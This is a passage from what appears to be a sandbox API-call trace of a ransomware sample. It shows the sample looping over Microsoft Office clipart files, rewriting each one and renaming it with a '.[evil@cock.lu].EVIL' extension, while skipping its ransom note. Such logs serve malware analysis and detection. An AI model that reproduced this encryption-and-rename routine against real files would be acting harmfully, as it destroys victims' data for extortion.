Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02361_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02361_.wmf.[evil@cock.lu].evil")) returned 1 [0161.134] ??_V@YAXPEAX@Z () returned 0x1 [0161.137] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02361_.WMF", dwFileAttributes=0x200) returned 0 [0161.137] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.137] wcsstr (_Str="NA02368_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.137] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02368_.WMF") returned 69 [0161.137] wcscmp (_String1="NA02368_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.137] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02368_.WMF") returned 0x0 [0161.137] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02368_.WMF") returned 0x45 [0161.137] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02368_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02368_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.140] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd28, lpOverlapped=0x0) returned 1 [0161.143] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.143] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.143] _errno () returned 0x84b1160840 [0161.143] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.143] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0xd40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd40, lpOverlapped=0x0) returned 1 [0161.143] CloseHandle (hObject=0x1a8) returned 1 [0161.143] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02368_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.144] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.144] __uncaught_exception () returned 0x84b1160800 [0161.144] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.144] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02368_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02368_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02368_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02368_.wmf.[evil@cock.lu].evil")) returned 1 [0161.145] ??_V@YAXPEAX@Z () returned 0x1 [0161.148] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02368_.WMF", dwFileAttributes=0x200) returned 0 [0161.148] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.148] wcsstr (_Str="NA02371_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.148] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02371_.WMF") returned 69 [0161.148] wcscmp (_String1="NA02371_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.148] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02371_.WMF") returned 0x0 [0161.148] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02371_.WMF") returned 0x45 [0161.149] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02371_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02371_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.151] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xc74, lpOverlapped=0x0) returned 1 [0161.153] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.153] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.153] _errno () returned 0x84b1160840 [0161.153] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.153] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0xc80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xc80, lpOverlapped=0x0) returned 1 [0161.154] CloseHandle (hObject=0x1a8) returned 1 [0161.154] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02371_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.154] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.154] __uncaught_exception () returned 0x84b1160800 [0161.154] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.154] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02371_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02371_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02371_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02371_.wmf.[evil@cock.lu].evil")) returned 1 [0161.155] ??_V@YAXPEAX@Z () returned 0x1 [0161.158] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02371_.WMF", dwFileAttributes=0x200) returned 0 [0161.158] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.158] wcsstr (_Str="NA02373_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.158] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02373_.WMF") returned 69 [0161.158] wcscmp (_String1="NA02373_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.158] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02373_.WMF") returned 0x0 [0161.158] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02373_.WMF") returned 0x45 [0161.158] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02373_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02373_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.161] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xcec, lpOverlapped=0x0) returned 1 [0161.164] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.164] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.164] _errno () returned 0x84b1160840 [0161.164] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.164] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0xd00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd00, lpOverlapped=0x0) returned 1 [0161.164] CloseHandle (hObject=0x1a8) returned 1 [0161.164] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02373_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.165] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.165] __uncaught_exception () returned 0x84b1160800 [0161.165] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.165] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02373_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02373_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02373_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02373_.wmf.[evil@cock.lu].evil")) returned 1 [0161.166] ??_V@YAXPEAX@Z () returned 0x1 [0161.169] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02373_.WMF", dwFileAttributes=0x200) returned 0 [0161.169] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.169] wcsstr (_Str="NA02384_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.170] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02384_.WMF") returned 69 [0161.170] wcscmp (_String1="NA02384_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.170] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02384_.WMF") returned 0x0 [0161.170] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02384_.WMF") returned 0x45 [0161.170] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02384_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02384_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.172] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xbd8, lpOverlapped=0x0) returned 1 [0161.175] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.175] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.175] _errno () returned 0x84b1160840 [0161.175] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.175] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xbe0, lpOverlapped=0x0) returned 1 [0161.175] CloseHandle (hObject=0x1a8) returned 1 [0161.176] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02384_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.176] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.176] __uncaught_exception () returned 0x84b1160800 [0161.176] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.176] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02384_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02384_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02384_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02384_.wmf.[evil@cock.lu].evil")) returned 1 [0161.177] ??_V@YAXPEAX@Z () returned 0x1 [0161.181] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02384_.WMF", dwFileAttributes=0x200) returned 0 [0161.181] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.181] wcsstr (_Str="NA02386_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.181] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02386_.WMF") returned 69 [0161.181] wcscmp (_String1="NA02386_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.181] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02386_.WMF") returned 0x0 [0161.181] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02386_.WMF") returned 0x45 [0161.181] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02386_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02386_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.183] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x948, lpOverlapped=0x0) returned 1 [0161.186] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.186] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.186] _errno () returned 0x84b1160840 [0161.187] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.187] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x960, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x960, lpOverlapped=0x0) returned 1 [0161.187] CloseHandle (hObject=0x1a8) returned 1 [0161.187] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02386_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.187] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.187] __uncaught_exception () returned 0x84b1160800 [0161.187] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.188] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02386_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02386_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02386_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02386_.wmf.[evil@cock.lu].evil")) returned 1 [0161.189] ??_V@YAXPEAX@Z () returned 0x1 [0161.192] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02386_.WMF", dwFileAttributes=0x200) returned 0 [0161.192] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.192] wcsstr (_Str="NA02388_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.192] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02388_.WMF") returned 69 [0161.192] wcscmp (_String1="NA02388_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.192] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02388_.WMF") returned 0x0 [0161.193] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02388_.WMF") returned 0x45 [0161.193] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02388_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02388_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.195] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xc84, lpOverlapped=0x0) returned 1 [0161.198] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.198] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.198] _errno () returned 0x84b1160840 [0161.198] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.198] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0xca0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xca0, lpOverlapped=0x0) returned 1 [0161.198] CloseHandle (hObject=0x1a8) returned 1 [0161.199] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02388_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.199] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.199] __uncaught_exception () returned 0x84b1160800 [0161.199] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.199] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02388_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02388_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02388_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02388_.wmf.[evil@cock.lu].evil")) returned 1 [0161.200] ??_V@YAXPEAX@Z () returned 0x1 [0161.204] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02388_.WMF", dwFileAttributes=0x200) returned 0 [0161.204] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.204] wcsstr (_Str="NA02389_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.204] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02389_.WMF") returned 69 [0161.204] wcscmp (_String1="NA02389_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.204] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02389_.WMF") returned 0x0 [0161.204] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02389_.WMF") returned 0x45 [0161.204] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02389_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02389_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.206] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb2c, lpOverlapped=0x0) returned 1 [0161.209] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.210] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.210] _errno () returned 0x84b1160840 [0161.210] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.210] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0xb40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb40, lpOverlapped=0x0) returned 1 [0161.210] CloseHandle (hObject=0x1a8) returned 1 [0161.210] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02389_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.210] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.211] __uncaught_exception () returned 0x84b1160800 [0161.211] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.211] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02389_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02389_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02389_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02389_.wmf.[evil@cock.lu].evil")) returned 1 [0161.212] ??_V@YAXPEAX@Z () returned 0x1 [0161.215] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02389_.WMF", dwFileAttributes=0x200) returned 0 [0161.216] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.216] wcsstr (_Str="NA02390_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.216] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02390_.WMF") returned 69 [0161.216] wcscmp (_String1="NA02390_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.216] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02390_.WMF") returned 0x0 [0161.216] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02390_.WMF") returned 0x45 [0161.216] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02390_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02390_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.218] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xe64, lpOverlapped=0x0) returned 1 [0161.221] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.221] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.221] _errno () returned 0x84b1160840 [0161.221] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.221] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xe80, lpOverlapped=0x0) returned 1 [0161.222] CloseHandle (hObject=0x1a8) returned 1 [0161.222] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02390_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.222] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.222] __uncaught_exception () returned 0x84b1160800 [0161.222] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.222] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02390_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02390_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02390_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02390_.wmf.[evil@cock.lu].evil")) returned 1 [0161.223] ??_V@YAXPEAX@Z () returned 0x1 [0161.227] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02390_.WMF", dwFileAttributes=0x200) returned 0 [0161.227] FindNextFileW (in: hFindFile=0x84b11dd980, 